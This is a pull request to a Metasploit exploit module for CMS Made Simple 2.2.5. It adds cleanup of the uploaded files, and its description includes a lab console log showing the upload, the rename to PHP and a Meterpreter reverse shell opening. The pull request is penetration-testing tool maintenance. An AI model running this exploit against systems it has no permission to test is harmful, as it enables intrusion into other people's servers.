### PR TITLE
Remove uploaded files from application

### DIFF
--- a/modules/exploits/multi/http/cmsms_upload_rename_rce.rb
+++ b/modules/exploits/multi/http/cmsms_upload_rename_rce.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
 
   def initialize(info = {})
     super(update_info(info,
@@ -162,6 +163,9 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::UnexpectedReply, 'Failed to rename the file')
     end
     vprint_good("#{peer} - File renamed #{filename}.php")
+
+    register_files_for_cleanup("#{filename}.txt")
+    register_files_for_cleanup("#{filename}.php")
 
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'uploads', "#{filename}.php"),

--- a/modules/exploits/multi/http/cmsms_upload_rename_rce.rb
+++ b/modules/exploits/multi/http/cmsms_upload_rename_rce.rb
@@ -164,8 +164,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
     vprint_good("#{peer} - File renamed #{filename}.php")
 
-    register_files_for_cleanup("#{filename}.txt")
-    register_files_for_cleanup("#{filename}.php")
+    register_files_for_cleanup("#{filename}.txt", "#{filename}.php")
 
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'uploads', "#{filename}.php"),


### PR DESCRIPTION
Update to exploit/multi/http/cmsms_upload_rename_rce module.
Delete files placed on disk.

- [x] Check the box

```
msf5 exploit(multi/http/cmsms_upload_rename_rce) > run 

[*] Started reverse TCP handler on 172.22.222.121:4444 
[*] 172.22.222.175:80 - CMS Made Simple Version: 2.2.5
[+] 172.22.222.175:80 - Authentication successful
[+] 172.22.222.175:80 - File uploaded qbkfunKE.txt
[+] 172.22.222.175:80 - File renamed qbkfunKE.php
[*] Sending stage (37775 bytes) to 172.22.222.175
[*] Meterpreter session 1 opened (172.22.222.121:4444 -> 172.22.222.175:49754) at 2018-07-31 09:50:00 -0500
[+] Deleted qbkfunKE.txt
[+] Deleted qbkfunKE.php

meterpreter > sysinfo
Computer    : MSEDGEWIN10
OS          : Windows NT MSEDGEWIN10 10.0 build 17134 (Windows 10) AMD64
Meterpreter : php/windows
meterpreter >
```